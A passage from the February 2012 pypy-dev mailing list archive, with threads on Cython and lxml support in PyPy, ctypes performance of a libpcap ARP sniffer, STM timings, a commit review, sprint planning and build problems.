Python code: >> >> def print_excinfo(): >> print(sys.exc_info()) >> >> Cython code: >> >> from stuff import print_excinfo >> >> try: >> raise TypeError >> except TypeError: >> print_excinfo() >> >> With the code removed, Cython will not store the TypeError in >> sys.exc_info(), so the Python code cannot see it. This may seem like an >> unimportant use case (who uses sys.exc_info() anyway, right?), but this >> becomes very visible when the code that uses sys.exc_info() is not user >> code but CPython itself, e.g. when raising another exception or when >> inspecting frames. Things grow really bad here, especially in Python 3. > > I think I understand now, thanks for your example. > Things are a bit simpler in PyPy because these exceptions are > stored in the frame that is currently handling it. At least better than > CPython > which stores it in one place, and has to somehow save the state of the > previous frames. > Did you consider adding such a function to CPython? > "PyErr_SetCurrentFrameExceptionInfo"? We need read/write access and also swap the exception with another one in some places (lacking a dedicated frame for generators, for example), that makes it two functions at least. CPython and its hand-written extensions won't have much use for this, so the only reason to add this would be to make PyPy (and maybe others) happier when running Cython extensions. I'll ask, although I wouldn't mind using a dedicated PyPy API for this. > For the record, pypy could implement it as: > space.getexecutioncontext().gettopframe_nohidden().last_exception = > operationerr > i.e. the thing returned by sys.exc_info(). I imagine that even if there is a way to do this from C code in PyPy, it would be too inefficient for something as common as exception handling. Stefan From stefan_ml at behnel.de Sun Feb 19 12:10:37 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 12:10:37 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 21:20: > 2012/2/18 Stefan Behnel > >> And now the question is: how do I debug into PyPy? From the nightly build, >> I don't get any debugging symbols in gdb, just a useless list of call >> addresses (running the ref-counting related "arg_incref" test here): >> >> """ >> #0 0x0000000000ef93ef in ?? () >> #1 0x0000000000fca0cb in PyDict_Next () >> > > This one I know: > It's a bug in our implementation of PyDict_Next() that I fixed > today with 568fc4237bf8: > http://mail.python.org/pipermail/pypy-commit/2012-February/059826.html It passes this test now. https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/9/console After continuing a bit, it next crashes in the "builtin_abs" test. The code in this test grabs a reference to the "__builtins__" module at the start of the module init code which it stored in a static variable. Then, in a test function, it tries to get the "abs" function from it, and that crashes PyPy in the PyObject_GetAttr() call. In gdb, it looks like the module got corrupted somehow, at least its ob_type reference points to dead memory. Could this be another one of those borrowed reference issues? The module reference is retrieved using PyImport_AddModule(), which returns a borrowed reference. Some more errors that I see in the logs up to that point, which all hint at missing bits of the C-API implementation: specialfloatvals.c:490: error: ?Py_HUGE_VAL? undeclared autotestdict_cdef.c:2087: error: ?PyWrapperDescrObject? undeclared bufaccess.c:22714: error: ?PyBoolObject? undeclared bufaccess.c:22715: error: ?PyComplexObject? undeclared buffmt.c:2589: warning: implicit declaration of function ?PyUnicode_Replace? Stefan From amauryfa at gmail.com Sun Feb 19 18:04:10 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sun, 19 Feb 2012 18:04:10 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/19 Stefan Behnel > bufaccess.c:22714: error: ?PyBoolObject? undeclared > > bufaccess.c:22715: error: ?PyComplexObject? undeclared > Why are these structures needed? Would Cython allow them to be only aliases to PyObject? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sun Feb 19 21:55:08 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 21:55:08 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 18.02.2012 11:20: > Amaury Forgeot d'Arc, 18.02.2012 10:08: >> I made some modifications to pypy, cython and lxml, >> and now I can compile and install cython, lxml, and they seem to work! >> >> For example:: >> html = etree.Element("html") >> body = etree.SubElement(html, "body") >> body.text = "TEXT" >> br = etree.SubElement(body, "br") >> br.tail = "TAIL" >> html.xpath("//text()") >> >> Here are the changes I made, some parts are really hacks and should be >> polished: >> lxml: http://paste.pocoo.org/show/552903/ > > The weakref changes are really unfortunate as they appear in one of the > most performance critical spots of lxml's API: on-the-fly proxy creation. To give an idea of how much overhead there is, here's a micro-benchmark. First, parsing: $ python2.7 -m timeit -s 'import lxml.etree as et' \ 'et.parse("input3.xml")' 10 loops, best of 3: 136 msec per loop $ pypy -m timeit -s 'import lxml.etree as et' \ 'et.parse("input3.xml")' 10 loops, best of 3: 127 msec per loop I have no idea why pypy is faster here - there really isn't any interaction with the core during XML parsing, certainly nothing that would account for some 7% of the runtime. Maybe some kind of building, benchmarking or whatever fault on my side. Anyway, parsing is clearly in the same ballpark for both. However, when it comes to element proxy instantiation (collecting all elements in the XML tree here as a worst-case example), there is a clear disadvantage for PyPy: $ python2.7 -m timeit -s 'import lxml.etree as et; \ el=et.parse("input3.xml").getroot()' 'list(el.iter())' 10 loops, best of 3: 84 msec per loop $ pypy -m timeit -s 'import lxml.etree as et; \ el=et.parse("input3.xml").getroot()' 'list(el.iter())' 10 loops, best of 3: 1.29 sec per loop That's about the same factor of 15 that you got. This may or may not matter to applications, though, because there are many tools in lxml that allow users to be very selective about which proxies they want to see instantiated, and to otherwise let a lot of functionality execute in C. So applications may get away with a performance hit below that factor in practice. What certainly matters for applications is to get the feature set of lxml within PyPy. Stefan From stefan_ml at behnel.de Sun Feb 19 22:06:08 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 19 Feb 2012 22:06:08 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 19.02.2012 18:04: > 2012/2/19 Stefan Behnel >> bufaccess.c:22714: error: ?PyBoolObject? undeclared >> >> bufaccess.c:22715: error: ?PyComplexObject? undeclared > > Why are these structures needed? Would Cython allow them to be > only aliases to PyObject? Not sure about the PyBoolObject. It's being referenced in the module setup code of the test module above, but doesn't seem to be used at all after that. Looks like a bug to me. I agree that PyBoolObject doesn't actually provide anything useful. That's different for PyComplexObject, which allows direct unboxed access to the real and imaginary number fields. Cython makes use of that for interfacing between C/C++ complex and Python complex. Regarding the PyWrapperDescrObject which I also mentioned in my last mail, I noticed that you already had a work-around for that in your initial patch. I'll see if I can get that implemented in a cleaner way (should be done at C compile time). Stefan From amauryfa at gmail.com Sun Feb 19 23:10:37 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Sun, 19 Feb 2012 23:10:37 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: 2012/2/19 Stefan Behnel > That's different for PyComplexObject, which allows direct unboxed access to > the real and imaginary number fields. Cython makes use of that for > interfacing between C/C++ complex and Python complex. > Why don't you use PyComplex_AsCComplex or other similar API for this? -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Mon Feb 20 09:05:06 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Mon, 20 Feb 2012 09:05:06 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 19.02.2012 23:10: > 2012/2/19 Stefan Behnel > >> That's different for PyComplexObject, which allows direct unboxed access to >> the real and imaginary number fields. Cython makes use of that for >> interfacing between C/C++ complex and Python complex. > > Why don't you use PyComplex_AsCComplex or other similar API for this? You are right, there is really just one mention of that in the code base, so it's easy to fix for non-CPython. Doing this, I noticed a bug in the standard declarations of CPython's C-API that Cython ships for user code, which leads to an accidental and useless reference to PyBoolObject and PyComplexObject in the generated modules. I'll find a way to fix those, too, so don't worry about them. Stefan From anto.cuni at gmail.com Mon Feb 20 12:05:38 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Mon, 20 Feb 2012 12:05:38 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: Message-ID: <4F422902.5030106@gmail.com> Hello S?bastien, I worked a bit on the pypy implementation of ctypes today, and now it is possible to pass ctypes arrays as parameters without leaving the fast path. The benchmark is still slower on PyPy, but not as much as before. Here are the results on my machine for running arp.py: cpython 2.7.2: 224 ms pypy-c 1.8: 1059 ms pypy-c trunk: 696 ms so, we are about 50% faster than before, although still slower than CPython. However, 224 ms is definitely too short for the JIT to warm up, so it would be nice if you could rerun the benchmark with a larger capture file. It's not necessary to retranslate pypy: you can just download pypy 1.8 and put the binary inside an updated copy of the mercurial repo (the relevant checkin is 6566e81c76a8). thank you! ciao, Anto On 02/13/2012 01:33 PM, S?bastien Volle wrote: > Hi all, > > My team is working on a project of fast packet sniffers and I'm comparing > performance between different languages. > So, we came up with a simple ARP sniffer that I ported to Python using ctypes. > > During my investigations, I turned out that using ctypes, PyPy 1.8 is > 4x slower than CPython 2.6.5. > After looking at the PyPy buglist, it's seems there are couple open issues > about ctypes so I figured I would ask you guys first before filing a new bug. > > I'm pretty new to ctypes and pypy so I'm not sure I understand what's going. > My program seems to spend a lot of time in ctypes/function.py:_convert_args > though, has the following profile trace demonstrates: > > $ pypy -m cProfile -s time arp.py > Packet buffer now at 0x9CCECB2 > Capture started > elapsed time : 3983.84ms > Total packets : 35571 > packets/s : 8928.81 > > 7839198 function calls (7838340 primitive calls) in 4.105 seconds > > Ordered by: internal time > > ncalls tottime percall cumtime percall filename:lineno(function) > 69876 0.546 0.000 1.584 0.000 function.py:480(_convert_args) > 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) > 1052195 0.206 0.000 0.206 0.000 {isinstance} > 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' objects} > 175326 0.187 0.000 0.407 0.000 function.py:350(_call_funcptr) > 1 0.173 0.173 4.105 4.105 arp.py:1() > 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) > 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) > 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) > 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) > 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) > 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) > 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of > 'Array' objects} > 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) > 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of > 'StructureInstance' objects} > 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) > 71142 0.076 0.000 0.320 0.000 structure.py:174(from_address) > 105450 0.075 0.000 0.145 0.000 function.py:593(_build_result) > 139755 0.072 0.000 0.120 0.000 > primitive.py:64(generic_xxx_p_from_param) > 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) > 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' objects} > 107986 0.055 0.000 0.055 0.000 {method '__new__' of > '_ctypes.primitive.SimpleType' objects} > 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) > 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) > 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) > 106713 0.047 0.000 0.047 0.000 {method '__new__' of > '_ctypes.array.ArrayMeta' objects} > 139750 0.043 0.000 0.181 0.000 primitive.py:84(from_param_void_p) > 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) > 283592/283435 0.041 0.000 0.041 0.000 {len} > 71144 0.040 0.000 0.040 0.000 {method '__new__' of > '_ctypes.structure.StructOrUnionMeta' objects} > 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' of > '_ffi.FuncPtr' objects} > 176683 0.037 0.000 0.037 0.000 {hasattr} > 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) > > > Anyway, I attached my full project to this mail, including a sample pcap > capture file. It requires libpcap to be installed on your system. Run arp.py > to run the sniffer on the included demo.pcap capture file. > I realize I should try and narrow down the issue some more, but I can't really > afford to spend too much time on this right now so hopefully, this will be a > least a bit helpful. > > Thanks! > > Regards, > S?bastien > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From arigo at tunes.org Mon Feb 20 12:21:06 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 20 Feb 2012 12:21:06 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi all, An update: now we can translate "--stm -O2", with a twist (the method cache is disabled), and the timings are: 1 thread: 2031ms 2 threads: 1194ms 4 threads: 840ms 8 threads: 533ms It's worth pointing out, because it's the first time I see a measure (the last one) which is *faster* than the single-core, no-stm, no-jit version. We are not done yet, because CPython runs the same program at 303ms. But we're getting there :-) A bient?t, Armin. From sebastien.volle at gmail.com Mon Feb 20 12:59:26 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Mon, 20 Feb 2012 12:59:26 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: <4F422902.5030106@gmail.com> References: <4F422902.5030106@gmail.com> Message-ID: Hello Antonio, Thank you for the update. I'll try and run a long running capture. Several days worth of ARP packets should be enough to maximize JIT effect I suppose. I'll keep you updated. Regards, S?bastien Le 20 f?vrier 2012 12:05, Antonio Cuni a ?crit : > Hello S?bastien, > > I worked a bit on the pypy implementation of ctypes today, and now it is > possible to pass ctypes arrays as parameters without leaving the fast path. > The benchmark is still slower on PyPy, but not as much as before. Here are > the results on my machine for running arp.py: > > cpython 2.7.2: 224 ms > pypy-c 1.8: 1059 ms > pypy-c trunk: 696 ms > > so, we are about 50% faster than before, although still slower than > CPython. > However, 224 ms is definitely too short for the JIT to warm up, so it > would be nice if you could rerun the benchmark with a larger capture file. > > It's not necessary to retranslate pypy: you can just download pypy 1.8 and > put the binary inside an updated copy of the mercurial repo (the relevant > checkin is 6566e81c76a8). > > thank you! > ciao, > Anto > > > On 02/13/2012 01:33 PM, S?bastien Volle wrote: > >> Hi all, >> >> My team is working on a project of fast packet sniffers and I'm comparing >> performance between different languages. >> So, we came up with a simple ARP sniffer that I ported to Python using >> ctypes. >> >> During my investigations, I turned out that using ctypes, PyPy 1.8 is >> 4x slower than CPython 2.6.5. >> After looking at the PyPy buglist, it's seems there are couple open issues >> about ctypes so I figured I would ask you guys first before filing a new >> bug. >> >> I'm pretty new to ctypes and pypy so I'm not sure I understand what's >> going. >> My program seems to spend a lot of time in ctypes/function.py:_convert_** >> args >> though, has the following profile trace demonstrates: >> >> $ pypy -m cProfile -s time arp.py >> Packet buffer now at 0x9CCECB2 >> Capture started >> elapsed time : 3983.84ms >> Total packets : 35571 >> packets/s : 8928.81 >> >> 7839198 function calls (7838340 primitive calls) in 4.105 seconds >> >> Ordered by: internal time >> >> ncalls tottime percall cumtime percall filename:lineno(function) >> 69876 0.546 0.000 1.584 0.000 >> function.py:480(_convert_args) >> 214696 0.256 0.000 0.429 0.000 structure.py:236(_subarray) >> 1052195 0.206 0.000 0.206 0.000 {isinstance} >> 632437 0.192 0.000 0.192 0.000 {method 'append' of 'list' >> objects} >> 175326 0.187 0.000 0.407 0.000 >> function.py:350(_call_funcptr) >> 1 0.173 0.173 4.105 4.105 arp.py:1() >> 209628 0.158 0.000 0.587 0.000 primitive.py:272(from_param) >> 214696 0.149 0.000 0.963 0.000 structure.py:90(__get__) >> 71144 0.143 0.000 0.198 0.000 structure.py:216(__new__) >> 106713 0.130 0.000 0.208 0.000 array.py:70(_CData_output) >> 105450 0.124 0.000 2.281 0.000 function.py:689(__call__) >> 69876 0.123 0.000 1.943 0.000 function.py:278(__call__) >> 321412 0.102 0.000 0.102 0.000 {method 'fromaddress' of >> 'Array' objects} >> 209628 0.088 0.000 0.811 0.000 function.py:437(_conv_param) >> 179125 0.083 0.000 0.083 0.000 {method 'fieldaddress' of >> 'StructureInstance' objects} >> 69883 0.080 0.000 0.122 0.000 primitive.py:308(__init__) >> 71142 0.076 0.000 0.320 0.000 >> structure.py:174(from_address) >> 105450 0.075 0.000 0.145 0.000 >> function.py:593(_build_result) >> 139755 0.072 0.000 0.120 0.000 >> primitive.py:64(generic_xxx_p_**from_param) >> 107983 0.070 0.000 0.125 0.000 basics.py:60(_CData_output) >> 209828 0.062 0.000 0.062 0.000 {method 'get' of 'dict' >> objects} >> 107986 0.055 0.000 0.055 0.000 {method '__new__' of >> '_ctypes.primitive.SimpleType' objects} >> 71142 0.052 0.000 0.372 0.000 pointer.py:77(getcontents) >> 35578 0.052 0.000 0.125 0.000 pointer.py:62(__init__) >> 35576 0.050 0.000 0.062 0.000 pointer.py:83(setcontents) >> 106713 0.047 0.000 0.047 0.000 {method '__new__' of >> '_ctypes.array.ArrayMeta' objects} >> 139750 0.043 0.000 0.181 0.000 primitive.py:84(from_param_ >> **void_p) >> 209625 0.043 0.000 0.691 0.000 basics.py:50(get_ffi_param) >> 283592/283435 0.041 0.000 0.041 0.000 {len} >> 71144 0.040 0.000 0.040 0.000 {method '__new__' of >> '_ctypes.structure.**StructOrUnionMeta' objects} >> 105450 0.039 0.000 0.039 0.000 {method 'free_temp_buffers' of >> '_ffi.FuncPtr' objects} >> 176683 0.037 0.000 0.037 0.000 {hasattr} >> 35571 0.037 0.000 0.423 0.000 pcap.py:89(next) >> >> >> Anyway, I attached my full project to this mail, including a sample pcap >> capture file. It requires libpcap to be installed on your system. Run >> arp.py >> to run the sniffer on the included demo.pcap capture file. >> I realize I should try and narrow down the issue some more, but I can't >> really >> afford to spend too much time on this right now so hopefully, this will >> be a >> least a bit helpful. >> >> Thanks! >> >> Regards, >> S?bastien >> >> >> ______________________________**_________________ >> pypy-dev mailing list >> pypy-dev at python.org >> http://mail.python.org/**mailman/listinfo/pypy-dev >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From anto.cuni at gmail.com Mon Feb 20 13:38:14 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Mon, 20 Feb 2012 13:38:14 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F422902.5030106@gmail.com> Message-ID: <4F423EB6.1020601@gmail.com> On 02/20/2012 12:59 PM, S?bastien Volle wrote: > Hello Antonio, > > Thank you for the update. I'll try and run a long running capture. Several > days worth of ARP packets should be enough to maximize JIT effect I suppose. > I'll keep you updated. to amortize the JIT warmup cost, it's probably enough to have a benchmark which runs for few seconds. No clue how many days of ARP packets are needed for that, though :-). ciao, Anto From alex.gaynor at gmail.com Mon Feb 20 18:50:00 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Mon, 20 Feb 2012 12:50:00 -0500 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> Message-ID: Unfortunately this commit has some bad effects. Going through an iterator in popitem() will result in O(N**2) behavior for repeated calls. If you look at the r_dict implementation of popitem() you can see the fix there. Alex On Mon, Feb 20, 2012 at 6:18 AM, cfbolz wrote: > Author: Carl Friedrich Bolz > Branch: > Changeset: r52670:4b254e123047 > Date: 2012-02-20 12:17 +0100 > http://bitbucket.org/pypy/pypy/changeset/4b254e123047/ > > Log: issue1059 testing > > make the .__dict__.clear method of builtin types raise an error. Fix > popitem on dict proxies (builtin types raise an error, normal types > work normally). > > diff --git a/pypy/objspace/std/dictmultiobject.py > b/pypy/objspace/std/dictmultiobject.py > --- a/pypy/objspace/std/dictmultiobject.py > +++ b/pypy/objspace/std/dictmultiobject.py > @@ -142,6 +142,13 @@ > else: > return result > > + def popitem(self, w_dict): > + space = self.space > + iterator = self.iter(w_dict) > + w_key, w_value = iterator.next() > + self.delitem(w_dict, w_key) > + return (w_key, w_value) > + > def clear(self, w_dict): > strategy = self.space.fromcache(EmptyDictStrategy) > storage = strategy.get_empty_storage() > diff --git a/pypy/objspace/std/dictproxyobject.py > b/pypy/objspace/std/dictproxyobject.py > --- a/pypy/objspace/std/dictproxyobject.py > +++ b/pypy/objspace/std/dictproxyobject.py > @@ -3,7 +3,7 @@ > from pypy.objspace.std.dictmultiobject import W_DictMultiObject, > IteratorImplementation > from pypy.objspace.std.dictmultiobject import DictStrategy > from pypy.objspace.std.typeobject import unwrap_cell > -from pypy.interpreter.error import OperationError > +from pypy.interpreter.error import OperationError, operationerrfmt > > from pypy.rlib import rerased > > @@ -44,7 +44,8 @@ > raise > if not w_type.is_cpytype(): > raise > - # xxx obscure workaround: allow cpyext to write to > type->tp_dict. > + # xxx obscure workaround: allow cpyext to write to > type->tp_dict > + # xxx even in the case of a builtin type. > # xxx like CPython, we assume that this is only done early > after > # xxx the type is created, and we don't invalidate any cache. > w_type.dict_w[key] = w_value > @@ -86,8 +87,14 @@ > for (key, w_value) in > self.unerase(w_dict.dstorage).dict_w.iteritems()] > > def clear(self, w_dict): > - self.unerase(w_dict.dstorage).dict_w.clear() > - self.unerase(w_dict.dstorage).mutated(None) > + space = self.space > + w_type = self.unerase(w_dict.dstorage) > + if (not space.config.objspace.std.mutable_builtintypes > + and not w_type.is_heaptype()): > + msg = "can't clear dictionary of type '%s'" > + raise operationerrfmt(space.w_TypeError, msg, w_type.name) > + w_type.dict_w.clear() > + w_type.mutated(None) > > class DictProxyIteratorImplementation(IteratorImplementation): > def __init__(self, space, strategy, dictimplementation): > diff --git a/pypy/objspace/std/test/test_dictproxy.py > b/pypy/objspace/std/test/test_dictproxy.py > --- a/pypy/objspace/std/test/test_dictproxy.py > +++ b/pypy/objspace/std/test/test_dictproxy.py > @@ -22,6 +22,9 @@ > assert NotEmpty.string == 1 > raises(TypeError, 'NotEmpty.__dict__.setdefault(15, 1)') > > + key, value = NotEmpty.__dict__.popitem() > + assert (key == 'a' and value == 1) or (key == 'b' and value == 4) > + > def test_dictproxyeq(self): > class a(object): > pass > @@ -43,6 +46,11 @@ > assert s1 == s2 > assert s1.startswith('{') and s1.endswith('}') > > + def test_immutable_dict_on_builtin_type(self): > + raises(TypeError, "int.__dict__['a'] = 1") > + raises(TypeError, int.__dict__.popitem) > + raises(TypeError, int.__dict__.clear) > + > class AppTestUserObjectMethodCache(AppTestUserObject): > def setup_class(cls): > cls.space = gettestobjspace( > diff --git a/pypy/objspace/std/test/test_typeobject.py > b/pypy/objspace/std/test/test_typeobject.py > --- a/pypy/objspace/std/test/test_typeobject.py > +++ b/pypy/objspace/std/test/test_typeobject.py > @@ -993,7 +993,9 @@ > raises(TypeError, setattr, list, 'append', 42) > raises(TypeError, setattr, list, 'foobar', 42) > raises(TypeError, delattr, dict, 'keys') > - > + raises(TypeError, 'int.__dict__["a"] = 1') > + raises(TypeError, 'int.__dict__.clear()') > + > def test_nontype_in_mro(self): > class OldStyle: > pass > _______________________________________________ > pypy-commit mailing list > pypy-commit at python.org > http://mail.python.org/mailman/listinfo/pypy-commit > -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From mmueller at python-academy.de Mon Feb 20 20:55:47 2012 From: mmueller at python-academy.de (=?UTF-8?B?TWlrZSBNw7xsbGVy?=) Date: Mon, 20 Feb 2012 20:55:47 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> Message-ID: <4F42A543.6070504@python-academy.de> I conclude from this thread that we settled for June 22 - 27. Other conclusions? If no, we found the date and I would like to fix it. Mike Am 17.02.12 21:40, schrieb Stefan Behnel: > Mike M?ller, 17.02.2012 21:05: >> Am 17.02.12 20:26, schrieb Maciej Fijalkowski: >>> On Fri, Feb 17, 2012 at 9:16 PM, Stefan Behnel wrote: >>>> Just a note that I'll be in Leipzig up to the 15th of June anyway (giving a >>>> Cython course). I don't know if the week after that suits *anyone* >>>> (including Mike), but if you could move the sprint another week earlier, >>>> I'd arrange to stay for the week-end (16/17th) and we could discuss >>>> Cython/PyPy integration topics there. >> >> This week is still available. >> >>> I'm afraid I can't make it that early :( Since my home base is cape >>> town travelling back and forth for 10 days just does not make any >>> sense. >>> >>> 22-27 (being all full sprint days right? we usually do 3 + 1 + 3 >>> including weekends) sounds very good to me. >> >> I think the one with the longest traveling distance should get the highest >> priority, which puts 22-27 into the pole positions. > > Agreed. > > >> Stefan: How about coming to Leipzig again? I know it is about 5 hours >> by train (much longer than it needs to be :( ). Train tickets get rather >> inexpensive when booked well ahead and valid for a specific train only. >> Well, there is still the extra time. > > Yes, 5:30 hours for a direct connection is exceedingly long for that > distance - Hamburg is about the same time. But if there is serious > interest, I'll see if I can make it for the Friday. > > Stefan > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From arigo at tunes.org Mon Feb 20 23:35:09 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 20 Feb 2012 23:35:09 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F42A543.6070504@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> <4F42A543.6070504@python-academy.de> Message-ID: Hi Mike, On Mon, Feb 20, 2012 at 20:55, Mike M?ller wrote: > I conclude from this thread that we settled for June 22 - 27. > Other conclusions? > If no, we found the date and I would like to fix it. I agree. Thanks a lot Mike! A bient?t, Armin. From gbowyer at fastmail.co.uk Tue Feb 21 00:46:52 2012 From: gbowyer at fastmail.co.uk (Greg Bowyer) Date: Mon, 20 Feb 2012 15:46:52 -0800 Subject: [pypy-dev] Biting off more than I can chew Message-ID: <4F42DB6C.7010307@fastmail.co.uk> The other night I got this burning desire to recreate the Azul GPGC (the java pauseless collector) inside pypy, with a view that it could be used alongside the STM work to make pypy a low (no?) pause concurrent VM. When I started tackling the code I realised I might have bitten off a little more than I can chew. My question (probably one of many to irritate and annoy all the fine folks here) would be, is there a sensible way to compile into pypy a small amount of C code that can be used to bootstrap and bridge some esoteric c libraries into pypy, the code that I want to run, on startup of pypy would be the following https://bitbucket.org/GregBowyer/pypy-c4gc/changeset/0de575b3a8d1#chg-azm_mem_test/test.c I have noticed that there are a few bridges into direct c code in the pypy source, but I cannot fathom how these are linked into RPython -- Greg From amauryfa at gmail.com Tue Feb 21 01:24:04 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 21 Feb 2012 01:24:04 +0100 Subject: [pypy-dev] Biting off more than I can chew In-Reply-To: <4F42DB6C.7010307@fastmail.co.uk> References: <4F42DB6C.7010307@fastmail.co.uk> Message-ID: 2012/2/21 Greg Bowyer > My question (probably one of many to irritate and annoy all the fine folks > here) would be, is there a sensible way to compile into pypy a small amount > of C code that can be used to bootstrap and bridge some esoteric c > libraries into pypy, the code that I want to run, on startup of pypy would > be the following https://bitbucket.org/**GregBowyer/pypy-c4gc/** > changeset/0de575b3a8d1#chg-**azm_mem_test/test.c > It's not annoying at all, we use it in strategic places. For example, see how pypy/rlib/_rffi_stacklet.py implements a stacklet C library that can be used in RPython. It uses an "ExternalCompilationInfo" (eci) object: - separate_module_files lists the .c files you want to compile and link - separate_module_sources is an easy way to embed C snippets (each source will create a .c file) Then you can use rffi.llexternal with "compilation_info=eci" to declare a function defined in this library. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Tue Feb 21 01:38:12 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 20 Feb 2012 17:38:12 -0700 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> <4F3D90DD.2010804@gmail.com> <4F3EB310.5090208@python-academy.de> <4F42A543.6070504@python-academy.de> Message-ID: On Mon, Feb 20, 2012 at 3:35 PM, Armin Rigo wrote: > Hi Mike, > > On Mon, Feb 20, 2012 at 20:55, Mike M?ller wrote: >> I conclude from this thread that we settled for June 22 - 27. >> Other conclusions? >> If no, we found the date and I would like to fix it. > > I agree. ?Thanks a lot Mike! Yes. And thank you mike for sponsoring and organizing the event! From phillip.d.class at gmail.com Tue Feb 21 16:18:39 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Tue, 21 Feb 2012 15:18:39 +0000 Subject: [pypy-dev] Building PyPy with cx_Oracle fails Message-ID: Building PyPy with cx_Oracle fails. I am using Python 2.7 on Ubuntu 64-bit with Oracle 11.2. Build command is: python translate.py -Ojit targetpypystandalone.py --withmod-oracle. Below is the traceback: [Timer] Timings: [Timer] annotate --- 1834.3 s [Timer] rtype_lltype --- 1697.2 s [Timer] pyjitpl_lltype --- 1216.3 s [Timer] =========================================== [Timer] Total: --- 4747.9 s [translation:ERROR] Error: [translation:ERROR] Traceback (most recent call last): [translation:ERROR] File "translate.py", line 309, in main [translation:ERROR] 